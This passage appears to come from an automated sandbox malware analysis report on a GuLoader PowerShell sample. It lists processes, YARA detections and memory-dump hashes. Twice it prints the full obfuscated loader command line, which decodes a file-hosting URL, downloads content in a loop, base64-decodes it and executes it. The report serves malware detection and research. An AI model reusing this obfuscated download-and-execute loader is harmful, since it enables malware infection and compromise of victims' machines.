Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa 
hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. 
to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. 
ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:04:02:46
                                Start date:30/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:04:02:58
                                Start date:30/09/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa 
hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. 
to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. 
ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
                                Imagebase:0xb50000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2713834484.0000000008BE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2700448526.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2714081528.000000000BE9C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:04:02:58
                                Start date:30/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:8
                                Start time:04:03:19
                                Start date:30/09/2024
                                Path:C:\Windows\SysWOW64\msiexec.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\syswow64\msiexec.exe"
                                Imagebase:0x9c0000
                                File size:59'904 bytes
                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5a76ab5b1cca0155a5982a91d980581022af711b5266dcffb5e402d787bcfe5
                                  • Instruction ID: edecb15cc364a9010e8ff384472bf96b4bf9aed369dbadf5e2df474f720a16e8
                                  • Opcode Fuzzy Hash: f5a76ab5b1cca0155a5982a91d980581022af711b5266dcffb5e402d787bcfe5
                                  • Instruction Fuzzy Hash: EEF0A73271C6044FDB4CAA0CF4529B473D1E785320B10017EE48BC2296D917E8428681
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 70a03f52a456435edf1a2c948af50a7dd6748a682cf000943729206c2d9a983f
                                  • Instruction ID: f0d149d6b03520580bd5b2d1119402f46befbd5da814d72d9d12793787e93408
                                  • Opcode Fuzzy Hash: 70a03f52a456435edf1a2c948af50a7dd6748a682cf000943729206c2d9a983f
                                  • Instruction Fuzzy Hash: A1C10493B1F6D62FE7625B6828750E47F94AF2267871E00FBC4D84F0E39D056D4A8392
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fa73db551b295f6e0df477d452fb9ba5a360b73e94d007ab39483453c94d6c92
                                  • Instruction ID: 08dbeb48a88156f329f96c6bc95560fc5025dec10964b52e24b69ddb39fa2312
                                  • Opcode Fuzzy Hash: fa73db551b295f6e0df477d452fb9ba5a360b73e94d007ab39483453c94d6c92
                                  • Instruction Fuzzy Hash: 9AB15F70E00209DFDF10DFA9D9857AEBBF2AF88318F14852DD815A7254EB74A946CF81
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08bdbcf5d748e29a65ac268633d431a258f091494de42a2b88da3e9ca250edf0
                                  • Instruction ID: e5e4b95b34de191a4886678cba6d4595c0e185c66f04c343143d689634cba472
                                  • Opcode Fuzzy Hash: 08bdbcf5d748e29a65ac268633d431a258f091494de42a2b88da3e9ca250edf0
                                  • Instruction Fuzzy Hash: 33B15E71E00209CFDF10DFA9D98179DBBF2AF88318F14852DE815EB294EB74A945CB81
                                  • Opcode Fuzzy Hash: 6df84950855bbafcc1a80975dbf74a08cd93c17605cb3e1ea9923daa69972ba3
                                  • Instruction Fuzzy Hash: 49418E71B002448FDB18EB28C998ABDBBB7EF89714F04406CE406EB7A5CB34AD41CB50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c40cc19861100a94bfc1aa557ef8ff2b82c00535d8a92b3d52ec5dd8313e2c8f
                                  • Instruction ID: 9bc67c09fbde30a7f6ba3c7036fabf85383a13ce2ca64642dd65fac705f0ec1c
                                  • Opcode Fuzzy Hash: c40cc19861100a94bfc1aa557ef8ff2b82c00535d8a92b3d52ec5dd8313e2c8f
                                  • Instruction Fuzzy Hash: C6418E70A00218CFCB18EFA9C4846ADBBF2FF84318F14852DD006AB7A5DB75AC46CB40
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7610d7f8a1716e398414d6357374ac0e8e4ec1bd75f521c4bfe388d4c3d99673
                                  • Instruction ID: 0103b17a32c8f08753e76ccc2dc4407455e76e45b5746393a83d78de86226a4f
                                  • Opcode Fuzzy Hash: 7610d7f8a1716e398414d6357374ac0e8e4ec1bd75f521c4bfe388d4c3d99673
                                  • Instruction Fuzzy Hash: A731A3F4B90208AFD704AB68C855FAFBAA3EB85344F50C464E9017F395CE769C918B91
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 507e4bf73f973c66fb85b741a9826b5e15e1418d4e9cacd92974c62c19943f9d
                                  • Instruction ID: e8ee7a0ba04a1cb5cccdb9d92d8c3560eb02274569ce519503a0fda3640917b4
                                  • Opcode Fuzzy Hash: 507e4bf73f973c66fb85b741a9826b5e15e1418d4e9cacd92974c62c19943f9d
                                  • Instruction Fuzzy Hash: 56218BF130031AABE7246ABE8886B3BB7C6EBC4700F54C47AA505DB385CD75C8C08360
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33ecf3633a46474652624a71121305b9b91b6dabf2f1d9852abda382ccef2ae9
                                  • Instruction ID: 4094a270e6d1b5bdf1ca149f012421d78d30c353407fc7fc35ff1a36da63b8bb
                                  • Opcode Fuzzy Hash: 33ecf3633a46474652624a71121305b9b91b6dabf2f1d9852abda382ccef2ae9
                                  • Instruction Fuzzy Hash: 1C313030B001288FCB25EB64C8546EEB7B2BF89308F1544E9D40AAB355DF35AE91CF95
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 057b4719c00a48e2a5924d1eafb3d5e4a6057f64b2b31faf85b3fb05227e03f9
                                  • Instruction ID: d8f21cdf53a3f087689060674910ad0083dc77ef94d23d18bf18484ac0c8ae14
                                  • Opcode Fuzzy Hash: 057b4719c00a48e2a5924d1eafb3d5e4a6057f64b2b31faf85b3fb05227e03f9
                                  • Instruction Fuzzy Hash: 6B219BF170436A7BE7212B6B88557767B96AF85700F98C4A6E544CF2C6CA35C8C883A1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e8ff41b06657ac465424e74c1b1bc29da78e37d79104730473c5b8e380e4afd8
                                  • Instruction ID: 6d68ba3ed5bc2fa9adf1e271bd711891cde860c0c311bdf88ccd38a317285e74
                                  • Opcode Fuzzy Hash: e8ff41b06657ac465424e74c1b1bc29da78e37d79104730473c5b8e380e4afd8
                                  • Instruction Fuzzy Hash: E1313E74A04645CFCB04CF98C484AA9FBF2FF49310B1586AAD859EB721C735EC41CBA0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1de0b060a9764df59c22a0546954fcd55b07ede9d3334fd269e197fca4c382f5
                                  • Instruction ID: 078aebbc3a8f668c113e285301f88ac8bbe2e3de40f30504c3426c2f872675e7
                                  • Opcode Fuzzy Hash: 1de0b060a9764df59c22a0546954fcd55b07ede9d3334fd269e197fca4c382f5
                                  • Instruction Fuzzy Hash: 7E012BB630021E9BD71469AAE400577FBDADFC1222F54C4BFED49CB641DA32D885C7A0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1999a3dc732eca94ba0328434cc7c0ee5a44b29c260471ccb72816fc0c802461
                                  • Instruction ID: 9b7aa820fe96a474533b7ca8f813b5f20d76966d7a228ae1d609afd5739eac7f
                                  • Opcode Fuzzy Hash: 1999a3dc732eca94ba0328434cc7c0ee5a44b29c260471ccb72816fc0c802461
                                  • Instruction Fuzzy Hash: 1F11B630D10149DBEF24EA94D5987ECB7B3AB0932DF14162DC001B61A0EB746A8ACB12
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2682705779.00000000033CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033CD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_33cd000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 357c64526e360ea5261937025c0b7d1ac317051c30e0ba495a8efdfbd9e42e96
                                  • Instruction ID: 4a9d7087fb3df301fc59754004d2729739f01ee04911cd163cad9a246cd63bb2
                                  • Opcode Fuzzy Hash: 357c64526e360ea5261937025c0b7d1ac317051c30e0ba495a8efdfbd9e42e96
                                  • Instruction Fuzzy Hash: ED017C724093909AE7108A29CDC4B67BF9CEB41224F18C56EED484A686C67D9842C7B1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2683167360.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_4c80000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08141ff0ca3ae324e6399ac636cbc0c34407fdd0ded03279d2727d36f059ab7d
